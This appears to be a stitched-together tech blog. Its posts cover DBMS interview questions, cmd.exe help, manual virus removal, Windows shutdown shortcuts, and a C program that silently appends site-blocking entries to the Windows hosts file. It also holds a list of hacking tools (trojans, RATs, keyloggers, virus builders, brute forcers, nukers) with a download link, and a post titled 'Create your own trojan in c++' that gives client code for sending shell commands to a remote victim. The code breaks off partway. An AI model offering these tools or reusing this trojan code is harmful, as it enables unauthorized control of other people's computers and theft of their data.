Quick Google Search

DBMS Interview Questions

1. What is database?
A database is a collection of information that is organized. So that it can easily be accessed, managed, and updated.

2. What is DBMS?
DBMS stands for Database Management System. It is a collection of programs that enables user to create and maintain a database.

3. What is a Database system?
The database and DBMS software together is called as Database system.

4.   What are the advantages of DBMS?
I.  Redundancy is controlled.
II.  Providing multiple user interfaces.
III. Providing backup and recovery
IV. Unauthorized access is restricted.
V.  Enforcing integrity constraints.

5. What is normalization?
It is a process of analysing the given relation schemas based on their Functional Dependencies (FDs) and primary key to achieve the properties
(1).Minimizing redundancy, (2). Minimizing insertion, deletion and update anomalies.

6. What is Data Model?
A collection of conceptual tools for describing data, data relationships data semantics and constraints.

7. What is E-R model?
This data model is based on real world that consists of basic objects  called entities and of relationship among these objects. Entities are described in a database by a set of attributes.

8. What is Object Oriented model?
This model is based on collection of objects. An object contains values stored in instance variables with in the object. An object also contains bodies of code that operate on the object. These bodies of code are called methods. Objects that contain same types of values and the same methods are grouped together into classes.

9. What is an Entity?
An entity is a thing or object of importance about which data must be captured.

10. What is DDL (Data Definition Language)?
A data base schema is specifies by a set of definitions expressed by a special language called DDL.

11. What is DML (Data Manipulation Language)?
This language that enable user to access or manipulate data as organised  by appropriate data model. Procedural DML or Low level: DML requires a user to specify what data are needed and how to get those data. Non-Procedural DML or High level: DML requires a user to specify what data are needed without specifying how  to get those data

12. What is DML Compiler?
It translates DML statements in a query language into low-level instruction that the query evaluation engine can understand.

13. What is Query evaluation engine?
It executes low-level instruction generated by compiler.

14. What is Functional Dependency?
Functional Dependency is the starting point of normalization. Functional Dependency exists when a relation between two attributes allows you to uniquely determine the corresponding attribute’s value.

15. What is 1 NF (Normal Form)?
The first normal form or 1NF is the first and the simplest type of normalization that can be implemented in a database. The main aims of 1NF are to:
1. Eliminate duplicative columns from the same table.
2. Create separate tables for each group of related data and identify each row with a unique column (the primary key).

16. What is Fully Functional dependency?
A functional dependency X Y is full functional dependency if removal of any attribute A from X means that the dependency does not hold any more.

17. What is 2NF?
A relation schema R is in 2NF if it is in 1NF and every non-prime attribute A in R is fully functionally dependent on primary key.

18. What is 3NF?
A relation is in third normal form if it is in Second Normal Form and there are no functional (transitive) dependencies between two (or more) non-primary key attributes.

19. What is BCNF (Boyce-Codd Normal Form)?
A table is in Boyce-Codd normal form (BCNF) if and only if it is in 3NF and every determinant is a candidate key.

20. What is 4NF?
Fourth normal form requires that a table be BCNF and contain no multi-valued dependencies.

21. What is 5NF?
A table is in fifth normal form (5NF) or Project-Join Normal Form (PJNF) if it is in 4NF and it cannot have a lossless decomposition into any number of smaller tables.

22. What is a query?
A query with respect to DBMS relates to user commands that are used to interact with a data base.

23. What is meant by query optimization?
The phase that identifies an efficient execution plan for evaluating a query that has the least estimated cost is referred to as query optimization.

24. What is an attribute?
It is a particular property, which describes the entity.

25. What is RDBMS?
Relational Data Base Management Systems (RDBMS) are database management systems that maintain data records and indices in tables.

26. What’s difference between DBMS and RDBMS?
DBMS provides a systematic and organized way of storing, managing and retrieving from collection of logically related information. RDBMS also provides what DBMS provides but above that it provides relationship integrity.

27. What is SQL?
SQL stands for Structured Query Language. SQL is an ANSI (American National Standards Institute) standard computer language for accessing and manipulating database systems. SQL statements are used to retrieve and update data in a database.

28. What is Stored Procedure?
A stored procedure is a named group of SQL statements that have been previously created and stored in the server database.

29. What is a view?
A view may be a subset of the database or it may contain virtual data that is derived from the database files but is not explicitly stored.

30. What is Trigger?
A trigger is a SQL procedure that initiates an action when an event (INSERT, DELETE or UPDATE) occurs.

31. What is Index?
An index is a physical structure containing pointers to the data.

32. What is extension and intension?
Extension -It is the number of tuples present in a table at any instance. This is time dependent.
Intension -It is a constant value that gives the name, structure of table and the constraints laid on it.

33. What do you mean by atomicity and aggregation?
Atomicity-Atomicity states that database modifications must follow an “all or nothing” rule. Each transaction is said to be “atomic.” If one part   of the transaction fails, the entire transaction fails.
Aggregation - A feature of the entity relationship model that allows a relationship set to participate in another relationship set. This is indicated on an ER diagram by drawing a dashed box around the aggregation.

34. What is RDBMS KERNEL?
Two important pieces of RDBMS architecture are the kernel, which is the software, and the data dictionary, which consists of the system- level data structures used by the kernel to manage the database.

35. Name the sub-systems of a RDBMS?
I/O, Security, Language Processing, Process Control, Storage Management, Logging and Recovery, Distribution Control, Transaction Control, Memory Management, Lock Management.

36. How do you communicate with an RDBMS?
You communicate with an RDBMS using Structured Query Language (SQL)

37. Disadvantage in File Processing System?
·        Data redundancy & inconsistency.
·        Difficult in accessing data.
·        Data isolation.
·        Data integrity.
·        Concurrent access is not possible.
·        Security Problems.

38. What is VDL (View Definition Language)?
It specifies user views and their mappings to the conceptual schema.

39.  What is SDL (Storage Definition Language)?
This language is to specify the internal schema. This language may Specify the mapping between two schemas.

40. Describe concurrency control?
Concurrency control is the process managing simultaneous operations against a database so that database integrity is no compromised. There are two approaches to concurrency control.
The pessimistic approach involves locking and the optimistic approach involves versioning.

41. Describe the difference between homogeneous and heterogeneous distributed database?
A homogenous database is one that uses the same DBMS at each node. A heterogeneous database is one that may have a different DBMS at each node.

42. What is a distributed database?
A distributed database is a single logical database that is spread across more than one node or locations that are all connected via some communication link.

43. Explain the difference between two and three-tier architectures?
Three-tier architecture includes a client and two server layers.
The   application code is stored on the application server and the database   is stored on the database server. A two-tier architecture includes a client and one server layer. The database is stored on the database server.

44. Briefly describe the three types of SQL commands?
Data definition language commands are used to create, alter, and drop tables. Data manipulation commands are used to insert, modify, update, and query data in the database. Data control language commands help the DBA to control the database.

45. List some of the properties of a relation?
Relations in a database have a unique name and no multivalued attributes exist. Each row is unique and each attribute within a relation has a unique name. The sequence of both columns and rows is irrelevant.

46. Explain the differences between an intranet and an extranet?
An Internet database is accessible by everyone who has access to a Web site. An intranet database limits access to only people within a given organization.

47. What is SQL Deadlock?
Deadlock is a unique situation in a multi user system that causes two or more users to wait indefinitely for a locked resource.

48. What is a Catalog?
A catalog is a table that contains the information such as structure of each file, the type and storage format of each data item and various constraints on the data .The information stored in the catalog is called Metadata.

49. What is data ware housing & OLAP?
Data warehousing and OLAP (online analytical processing) systems are the techniques used in many companies to extract and analyze useful  information from very large databases for decision making .

50. Describe the three levels of data abstraction?
Physical level: The lowest level of abstraction describes how data are stored.
Logical level: The next higher level of abstraction, describes what data are stored in database and what relationship among those data.
View level: The highest level of abstraction describes only part of entire database.

51. What is Data Independence?
Data independence means that the application is independent of the storage structure and access strategy of data.

52. How many types of relationship exist in database designing?
There are three major relationship models:-
One-to-one
One-to-many
Many-to-many

53. What is order by clause?
ORDER BY clause helps to sort the data in either ascending order to descending

54. What is the use of DBCC commands?
DBCC stands for database consistency checker. We use these commands to check   the consistency of the databases, i.e., maintenance, validation task and status checks.

55. What is Collation?
Collation refers to a set of rules that determine how data is sorted and compared.

56. What is difference between DELETE & TRUNCATE commands?
Delete command removes the rows from a table based on the condition that we provide with a WHERE clause. Truncate will actually remove all the rows from a table and there will be no data in the table after we run the truncate command.

57. What is Hashing technique?
This is a primary file organization technique that provides very fast access to records on certain search conditions.

58. What is a transaction?
A transaction is a logical unit of database processing that includes one or more database access operations.

59. What are the different phases of Transaction?
Analysis phase
Redo phase
Undo phase

60. What is “transparent dbms”?
It is one, which keeps its physical structure hidden from user.

61. What are the primitive operations common to all record management System?
Addition, deletion and modification.

62. Explain the differences between structured data and unstructured data.
Structured data are facts concerning objects and events. The most important structured data are numeric, character, and dates.
Structured data are stored in tabular form. Unstructured data are multimedia data such as documents, photographs, maps, images, sound, and video clips. Unstructured data are most commonly found on Web servers and Web-enabled databases.

63. What are the major functions of the database administrator?
Managing database structure, controlling concurrent processing, managing processing rights and responsibilities, developing database security, providing for database recovery, managing the DBMS and maintaining the data repository.

64. What is a dependency graph?
A dependency graph is a diagram that is used to portray the connections between database elements.

65. Explain the difference between an exclusive lock and a shared lock?
An exclusive lock prohibits other users from reading the locked resource; a shared lock allows other users to read the locked resource, but they cannot update it.

66. Explain the "paradigm mismatch" between SQL and application programming languages.
SQL statements return a set of rows, while an application program works on one row at a time. To resolve this mismatch the results of  SQL statements are processed as pseudofiles, using a cursor or pointer to specify which row is being processed.

67. Name four applications for triggers.
(1)Providing default values, (2) enforcing data constraints,
(3) Updating views and (4) enforcing referential integrity

68. What are the advantages of using stored procedures?
The advantages of stored procedures are (1) greater security, (2) decreased network traffic, (3) the fact that SQL can be optimized and (4) code sharing which leads to less work, standardized processing, and specialization among developers.

69. Explain the difference between attributes and identifiers.
Entities have attributes. Attributes are properties that describe the entity's characteristics. Entity instances have identifiers. Identifiers are attributes that name, or identify, entity instances.

70. What is Enterprise Resource Planning (ERP), and what kind of a database is used in an ERP application?
Enterprise Resource Planning (ERP) is an information system used in manufacturing companies and includes sales, inventory, production planning, purchasing and other business functions. An ERP system typically uses a multiuser database.

71. Describe the difference between embedded and dynamic SQL?
Embedded SQL is the process of including hard coded SQL statements. These statements do not change unless the source code is modified. Dynamic SQL is the process of generating SQL on the fly.The statements generated do not have to be the same each time.

72. Explain a join between tables
A join allows tables to be linked to other tables when a relationship between the tables exists. The relationships are established by using a common column in the tables and often uses the primary/foreign key relationship.

73. Describe a subquery.
A subquery is a query that is composed of two queries. The first query (inner query) is within the WHERE clause of the other query  (outer query).

74. Compare a hierarchical and network database model?
The hierarchical model is a top-down structure where each parent may have many children but each child can have only one parent. This model supports one-to-one and one-to-many relationships.
The network model can be much more flexible than the hierarchical model since each parent can have multiple children but each child can also have multiple parents. This model supports one-to-one, one-to-many, and many-to-many relationships.

75. Explain the difference between a dynamic and materialized view.
A dynamic view may be created every time that a specific view is requested by a user. A materialized view is created and or updated infrequently and it must be synchronized with its associated base table(s).

76. Explain what needs to happen to convert a relation to third normal form.
First you must verify that a relation is in both first normal form and second normal form. If the relation is not, you must convert into second normal form. After a relation is in second normal form, you must remove all transitive dependencies.

77. Describe the four types of indexes?
A unique primary index is unique and is used to find and store a row. A nonunique primary index is not unique and is used to find a row but also where to store a row (based on its unique primary index). A unique secondary index is unique for each row and used to find table rows. A nonunique secondary index is not unique and used to find table rows.

78. Explain minimum and maximum cardinality?
Minimum cardinality is the minimum number of instances of an entity that can be associated with each instance of another entity.  Maximum cardinality is the maximum number of instances of an entity that can be associated with each instance of another entity.

79. What is deadlock? How can it be avoided? How can it be resolved once it occurs?
Deadlock occurs when two transactions are each waiting on a resource that the other transaction holds. Deadlock can be prevented by requiring transactions to acquire all locks at the same time; once it occurs, the only way to cure it is to abort one of the transactions and back out of partially completed work.

80. Explain what we mean by an ACID transaction.
An ACID transaction is one that is atomic, consistent, isolated, and durable. Durable means that database changes are permanent. Consistency can mean either statement level or transaction level consistency. With transaction level consistency, a transaction may not see its own changes.Atomic means it is performed as a unit.

81. Under what conditions should indexes be used?
Indexes can be created to enforce uniqueness, to facilitate sorting, and to enable fast retrieval by column values. A good candidate for an index is a column that is frequently used with equal conditions in WHERE clauses.

82. What is difference between SQL and SQL SERVER?
SQL is a language that provides an interface to RDBMS, developed by IBM. SQL SERVER is a RDBMS just like Oracle, DB2.

83. What is Specialization?
It is the process of defining a set of subclasses of an entity type where each subclass contain all the attributes and relationships of the parent entity and may have additional attributes and relationships which are specific to itself.

84. What is generalization?
It is the process of finding common attributes and relations of a number of entities and defining a common super class for them.

85. What is meant by Proactive, Retroactive and Simultaneous Update?
Proactive Update: The updates that are applied to database before it becomes effective in real world.
Retroactive Update: The updates that are applied to database after it becomes effective in real world.
Simultaneous Update: The updates that are applied to database at the same time when it becomes effective in real world.

86. What is RAID Technology?
Redundant array of inexpensive (or independent) disks. The main goal of raid technology is to even out the widely different rates of performance improvement of disks against those in memory and microprocessor. Raid technology employs the technique of data striping to achieve higher transfer rates.

87. What are serial, non serial schedule?
A schedule S is serial if, for every transaction T participating in the schedule, all the operations of T is executed consecutively in the schedule, otherwise, the schedule is called non-serial schedule.

88. What are conflict serializable schedules?
A schedule S of n transactions is serializable if it is equivalent to some serial schedule of the same n transactions.

89. What is view serializable?
A schedule is said to be view serializable if it is view equivalent with some serial schedule.

90. What is a foreign key?
A key of a relation schema is called as a foreign key if it is the primary key of
some other relation to which it is related to.

91. What are the disadvantages of using a dbms?
1) High initial investments in h/w, s/w, and training.
2) Generality that a DBMS provides for defining and processing data.
3) Overhead for providing security, concurrency control, recovery, and integrity functions.

92. What is Lossless join property?
It guarantees that the spurious tuple generation does not occur with respect to relation schemas after decomposition.

93. What is a Phantom Deadlock?
In distributed deadlock detection, the delay in propagating local information might cause the deadlock detection algorithms to identify deadlocks that do not really exist. Such situations are called phantom deadlocks and they lead to unnecessary aborts.

94. What is a checkpoint and When does it occur?
A Checkpoint is like a snapshot of the DBMS state. By taking checkpoints, the DBMS can reduce the amount of work to be done during restart in the event of subsequent crashes.


95. What is schema?
The description of a data base is called the database schema , which is specified during database design and is not expected to change frequently . A displayed schema is called schema diagram .We call each object in the schema as schema construct.

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

How to Block a Website using C code ??

You can either copy form here or you can write you own code to block  a web site using C Language. :

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1?;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

*********************************END**************************************


We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

More about Command Prompt in windows OS.

About Command Prompt
the cmd.exe help : did you know?

Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
[[/S] [/C | /K] string]

/C Carries out the command specified by string and then terminates
/K Carries out the command specified by string but remains
/S Modifies the treatment of string after /C or /K (see below)
/Q Turns echo off
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
Unicode
/T:fg Sets the foreground/background colors (see COLOR /? for more info)
/E:ON Enable command extensions (see below)
/E:OFF Disable command extensions (see below)
/F:ON Enable file and directory name completion characters (see below)
/F:OFF Disable file and directory name completion characters (see below)
/V:ON Enable delayed environment variable expansion using ! as the
delimiter. For example, /V:ON would allow !var! to expand the
variable var at execution time. The var syntax expands variables
at input time, which is quite a different thing when inside of a FOR
loop.
/V:OFF Disable delayed environment expansion.

Note that multiple commands separated by the command separator '&&'
are accepted for string if surrounded by quotes. Also, for compatibility
reasons, /X is the same as /E:ON, /Y is the same as /E:OFF and /R is the
same as /C. Any other switches are ignored.

If /C or /K is specified, then the remainder of the command line after
the switch is processed as a command line, where the following logic is
used to process quote (") characters:
1. If all of the following conditions are met, then quote characters
on the command line are preserved:

- no /S switch
- exactly two quote characters
- no special characters between the two quote characters,
where special is one of: &<>()@^|
- there are one or more whitespace characters between the
the two quote characters
- the string between the two quote characters is the name
of an executable file.

2. Otherwise, old behavior is to see if the first character is
a quote character and if so, strip the leading character and
remove the last quote character on the command line, preserving
any text after the last quote character.

If /D was NOT specified on the command line, then when CMD.EXE starts, it
looks for the following REG_SZ/REG_EXPAND_SZ registry variables, and if
either or both are present, they are executed first.

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun

and/or

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun

Command Extensions are enabled by default. You may also disable
extensions for a particular invocation by using the /E:OFF switch. You
can enable or disable extensions for all invocations of CMD.EXE on a
machine and/or user logon session by setting either or both of the
following REG_DWORD values in the registry using REGEDT32.EXE:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions

and/or

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions

to either 0x1 or 0x0. The user specific setting takes precedence over
the machine setting. The command line switches take precedence over the
registry settings.
The command extensions involve changes and/or additions to the following
commands:

DEL or ERASE
COLOR
CD or CHDIR
MD or MKDIR
PROMPT
PUSHD
POPD
SET
SETLOCAL
ENDLOCAL
IF
FOR
CALL
SHIFT
GOTO
START (also includes changes to external command invocation)
ASSOC
FTYPE

To get specific details, type commandname /? to view the specifics.

Delayed environment variable expansion is NOT enabled by default. You
can enable or disable delayed environment variable expansion for a
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
machine and/or user logon session by setting either or both of the
following REG_DWORD values in the registry using REGEDT32.EXE:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion

and/or

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion

to either 0x1 or 0x0. The user specific setting takes precedence over
the machine setting. The command line switches take precedence over the
registry settings.

If delayed environment variable expansion is enabled, then the exclamation
character can be used to substitute the value of an environment variable
at execution time.
File and Directory name completion is NOT enabled by default. You can
enable or disable file name completion for a particular invocation of
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
session by setting either or both of the following REG_DWORD values in
the registry using REGEDT32.EXE:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar

and/or

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar

with the hex value of a control character to use for a particular
function (e.g. 0x4 is Ctrl-D and 0x6 is Ctrl-F). The user specific
settings take precedence over the machine settings. The command line
switches take precedence over the registry settings.

If completion is enabled with the /F:ON switch, the two control
characters used are Ctrl-D for directory name completion and Ctrl-F for
file name completion. To disable a particular completion character in
the registry, use the value for space (0x20) as it is not a valid
control character.
Completion is invoked when you type either of the two control
characters. The completion function takes the path string to the left
of the cursor appends a wild card character to it if none is already
present and builds up a list of paths that match. It then displays the
first matching path. If no paths match, it just beeps and leaves the
display alone. Thereafter, repeated pressing of the same control
character will cycle through the list of matching paths. Pressing the
Shift key with the control character will move through the list
backwards. If you edit the line in any way and press the control
character again, the saved list of matching paths is discarded and a new
one generated. The same occurs if you switch between file and directory
name completion. The only difference between the two control characters
is the file completion character matches both file and directory names,
while the directory completion character only matches directory names.
If file completion is used on any of the built in directory commands
(CD, MD or RD) then directory completion is assumed.

The completion code deals correctly with file names that contain spaces
or other special characters by placing quotes around the matching path.
Also, if you back up, then invoke completion from within a line, the
text to the right of the cursor at the point completion was invoked is
discarded.

The special characters that require quotes are:
<space>
&()[]{}^=;!'+,`~



************************************END***************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Learn more about kernel programming.

This is to all people who want to learn kernel programming.

first dont ask just for the sake of asking.Smart people need stimulating ques and challenges to think.A very obvious ques may go unattended.So ask smartly and like a hacker not like a windows luser :).

second use resources like books, ebooks, friends, teachers. If you still cant ask the Oracle...means Google;).Still you can't RTFM and then ask. This way you will end up learning a lot more than you ever imagined and you can ask correct ques. Problem is not in answering right but in asking a right ques. I hope you all understand what i mean. When you ask make sure that you list your efforts... so that people can understand that you really need help.

And please avoid asking like "help needed or urgent" if it is urgent please dont post it to a public and Open forum, we are not here to sort urgent matters whatsoever. Better give techincal details of the problem in sub rather than asking for help... it will be much better.

Last but not the least. Kernel programming needs discipline and hard work and cetainly it doesnot need genius.So please be patient and take every error, every crash you encounter as an oppurtunity to learn more about Linux kernel.

Lastly i would like to quote Eric Steven Raymond "shut up and show them the code" :).

And yes if possible go through a book by Eric Steven Raymond "The Art of Unix Programming" ...its and excellent read and a must for every Linux/Unix programmer both kernel programmers and Application programmers. :)

Please visit : http://wiki.osdev.org/Main_Page for more information

*****************************************************END*****************************************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Removing PC Viruses Manually. No need to use antivirus.

Manually Removing PC Viruses
Have you ever been in the possition that you know you have an virus but you dont have any antivirus?? Its almost impossible to remove it manual without knowing about a few tips & tricks.
After reading this turtorial im sure you will know how to manual remove most of the virus lurking around. But that dosnt mean you shouldnt have any anti virus on you computer!
Anyway, lets get starting with the turtorial.. I suppose you already know what safe mode is. If you dont try pressing the F8 key some times when you start your computer. You havto do this when your computer is about to start the first windows components. In win2k or xp i think you can press space and then F8 when it ask you if you want to go back to previous working setting.
Enough talk about how to start you computer in safe mode, but if you want to manual remove viruses you almost everytime haveto do this in safe mode becouse in safemode most viruses dosnt start. Only some few windows component is allowed to run in safemode. So here is what to do.
Step: 1: Start your computer in safemode.
2: If you know where the virus are hiding delete the executable file.
3: Open the registry and go to the keys below and add an : in front of the value of the string that you think its the virus. Like this, if string is "virus" and its value is "c:\virus.exe" change its value to ":c:\virus.exe". The : is like comenting out the value. But if you are sure its the virus you can just delete the string.
Here are the keys you maybe want to look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
4: The virus can start itself from some other places to. win.ini is the most common files that viruses can use. Soo you should find the files named win.ini and system.ini and look through them and see if you find anything.
5: Look through the startup folder that is normaly located in your profile directory \Start Menu\Programs\Startup.
6: Try searching for the virus executable to see if its hiding some other place.
7: Finally look through the list of services that windows is running. This list is often located under control panel - administrative tools - services. After this 7 steps just reboot your computer in normal mode and try to figure out if the virus is still there.. If not SUCCESS if yes, try to go back to safe mode and hunt some more. Off course this 7 steps will not work on every virus out there, but many of them.

-Be carefull with the registery, dont mess it up, if u do ur computer is ****** lol, depends on wat u mess up, i suggest u made a system restore point first, so incase someting happens you can go back on it. -


Credits..
@letsgainknwldge.com
*********************************End****************************************
We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

List of Hacking Softwares

Hacking Softwares:

Hacking Software Collection
Trojan Horse
- Yuri RAT
- MofoTro
- Charon
- Beast
- Omerta
- Theef
- Combined Forces R.A.T
- MoSucker
- ProRat
Keylogger
- Elite Keylogger
- SKL
- KeySpy
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binder
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner

WebHack/WordList
Brute Forcer
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix
CGI-Bug Scanner
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruse
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builder
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hack & Bot
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanner
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooder
- Rocket
- RPCNuke
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune
- Battle Pong - Technophoria
- Assault
- ICMP Nuker
- CLICK
EXTRA!
- Telnet Tutorial

Download
http://rapidshare.com/files/96374246/Hacking_software_Collectin_by_Hackers_Menia__Build_1.0


**************************************END************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

SPEED UP DOWNLOAD IN LESS THAN A MINUTE.

SPEED UP DOWNLOAD

Don't wait any longer for slow file downloads. Use this free program to accelerate them, regardless of your connection speed.

No matter how fast your Internet connection is, it's not fast enough. Whether it's a pokey dial-up or a broadband connection, you always have complaints and you always have a greater need for speed.

This is particularly true when you're downloading files, especially large ones. While there may be no way to physically change your connection speed, you can get the free Download Accelerator Plus (DAP) program from SpeedBit (http://www.speedbit.com) to speed up your downloads significantly, whether via FTP or HTTP.

The program accelerates your downloads in two ways. When you start to download a file, DAP does a mirror search of all the servers that carry the same file, identifies the fastest servers closest to you, and then starts downloading from those servers instead of the one you originally chose. It also sets up a multiconnection download, downloading portions of the file from multiple fast servers simultaneously and then reassembling the file when all the pieces are on your PC. This makes the most efficient use of your available bandwidth, because normally there are pauses and hesitations when you download, and if you're downloading with multiple connections there will be fewer of those pauses.

The program also resumes broken downloads; if for some reason your connection is broken, it'll pick up where you left off when you next connect to the Internet. Also useful is the ZIP preview feature that lets you preview the contents of ZIP-compressed files before you download. And it'll schedule downloads for you as well. For example, you can schedule downloads to take place overnight, when you're away from your computer.



************************************END**************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Startup & Shutdown Your PC in your own Way

STARTUP AND STUTDOWM


A grab bag of ways to customize the way you start up and shut down your system.

There are many small ways that you can control the way you start up and shut down your PC. This grab bag of four hacks shows you the best of them.

1.7.1 Create One-Click Shutdown and Reboot Shortcuts
Turning off or rebooting XP involves a several-step process: click the Start menu, choose Shut Down, and then select Shut Down or Restart. If you want, however, you can exit or reboot much more quickly, by creating a shortcut that enables one-click shutdowns. You can also use the shortcut to customize the shutdown or reboot—for example, by displaying a specific message or automatically shutting down any programs that are running.

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "See you later!"
shutdown -r -t 03 -c "You can't get rid of me that quickly!"
Table 1-3. Switches you can use with shutdown Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message

 **********************************************************END***********************************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Create your own trojan in c++

Trojan in c++ :
For client: -
//*****************************************************
#include <stdio.h>
#include "winsock2.h"
#include <iostream>

using namespace std;
int main() {

// Initialize Winsock.
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf("Error at WSAStartup()\n");

// Create a socket.
SOCKET m_socket;
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

if ( m_socket == INVALID_SOCKET ) {
printf( "Error at socket(): %ld\n", WSAGetLastError() );
WSACleanup();
return 1;
}
// Connect to a server.
sockaddr_in clientService;

clientService.sin_family = AF_INET;
char ip[15];
cout<<"Enter ip:";
cin>> ip;
clientService.sin_addr.s_addr = inet_addr( ip );
clientService.sin_port = htons( 27015 );

if ( connect( m_socket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR) {
printf( "Failed to connect.\n" );
WSACleanup();
return 1;
}

// Send and receive data.


char sendbuf[32];

// Command to be executed

char recvbuf[20] = "";

int bytesRecv = SOCKET_ERROR;


while(sendbuf!=0)
{
cout<<"Root:";
cin>> sendbuf;
send( m_socket, sendbuf, strlen(sendbuf), 0 );

